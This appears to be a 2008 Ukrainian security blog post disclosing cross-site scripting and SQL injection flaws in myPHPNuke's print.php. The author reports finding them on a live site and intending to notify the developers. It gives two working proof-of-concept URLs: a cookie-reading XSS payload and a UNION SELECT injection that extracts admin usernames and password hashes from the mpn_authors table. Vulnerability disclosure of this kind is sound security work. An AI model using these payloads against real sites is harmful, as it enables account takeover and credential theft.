XSS та SQL Injection уразливості в myPHPNuke

23:52 28.08.2008

Нещодавно, 24.08.2008, я знайшов Cross-Site Scripting та SQL Injection уразливості в системі myPHPNuke. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в myPHPNuke.

XSS:

http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1

Хоча до SQL Injection уразлива і myPHPNuke 1.8.8_8rc2, але в ній наявні додаткові фільтри, тому для проведення SQL Injection (а також XSS) потрібна попередня версія системи. Тому уразливі версії до myPHPNuke 1.8.8_8rc2 (а в останній версії системи можлива обмежена SQL Injection атака).


Leave a Reply

You must be logged in to post a comment.